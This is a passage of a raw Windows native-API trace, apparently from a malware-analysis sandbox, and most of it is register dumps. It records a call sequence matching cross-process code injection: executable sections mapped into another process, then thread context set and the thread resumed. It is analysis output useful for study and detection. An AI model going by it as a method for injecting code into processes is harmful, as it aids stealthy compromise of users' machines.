[470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0158.977] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0158.977] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x191200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x192000) returned 0x0 [0158.985] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x100, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x191200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x28f0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x192000) returned 0x0 [0159.016] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x3160000) returned 0x0 [0159.027] NtClose (Handle=0x108) returned 0x0 [0159.027] NtSetContextThread (ThreadHandle=0x104, Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x55fdc8, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x55fd70, Eip=0x29ee707, SegCs=0x23, EFlags=0x246, Esp=0x55fd54, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0159.028] NtResumeThread (in: ThreadHandle=0x104, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0159.028] NtClose (Handle=0x100) returned 0x0 [0159.028] NtClose (Handle=0x104) returned 0x0 [0159.029] NtOpenProcess (in: ProcessHandle=0x19ea74, DesiredAccess=0x438, ObjectAttributes=0x19ea3c*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0x19ea54*(UniqueProcess=0xbfc, UniqueThread=0x0) | out: ProcessHandle=0x19ea74*=0x104) returned 0x0 [0159.029] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x1a, ProcessInformation=0x19ea64, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ea64, ReturnLength=0x0) returned 0x0 [0159.029] NtQueryInformationProcess (in: ProcessHandle=0x104, ProcessInformationClass=0x0, ProcessInformation=0x19e6e8, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0x19e6e8, ReturnLength=0x0) returned 0x0 [0159.029] NtReadVirtualMemory (in: ProcessHandle=0x104, BaseAddress=0x7efde000, Buffer=0x19e9fc, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0x19e9fc*, NumberOfBytesRead=0x0) returned 0x0 [0159.029] NtDelayExecution (Alertable=0, Interval=0x19e6d0*=-50000000) returned 0x0 [0159.033] NtOpenThread (in: ThreadHandle=0x19ea68, DesiredAccess=0x1a, ObjectAttributes=0x19e6b4, ClientId=0x19e6cc*(UniqueProcess=0x0, UniqueThread=0x75c) | out: ThreadHandle=0x19ea68*=0x100) returned 0x0 [0159.033] NtSuspendThread (in: ThreadHandle=0x100, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0159.034] NtMapViewOfSection (in: SectionHandle=0xec, ProcessHandle=0x104, BaseAddress=0x19e708*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0x19e708*=0x1fc0000, SectionOffset=0x0, ViewSize=0x19e704*=0x9c4000) returned 0x0 [0159.039] NtGetContextThread (in: ThreadHandle=0x100, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x36f9b0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x36f958, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x36f93c, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0159.039] NtCreateSection (in: SectionHandle=0x19e6f0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x19e6b0, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x19e6f0*=0x108) returned 0x0 [0159.039] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0xffffffff, BaseAddress=0x19e6f8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6b0*=0x1ab200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f8*=0x3160000, SectionOffset=0x0, ViewSize=0x19e6b0*=0x1ac000) returned 0x0 [0159.047] NtMapViewOfSection (in: SectionHandle=0x108, ProcessHandle=0x104, BaseAddress=0x19e6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x19e6ec*=0x1ab200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x19e6f4*=0x8d0000, SectionOffset=0x0, ViewSize=0x19e6ec*=0x1ac000) returned 0x0 [0164.181] NtGetContextThread (in: ThreadHandle=0x104, Context=0x19e730 | out: Context=0x19e730*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x3efb30, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x3efad8, Eip=0x766e78d7, SegCs=0x23, EFlags=0x246, Esp=0x3efabc, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, 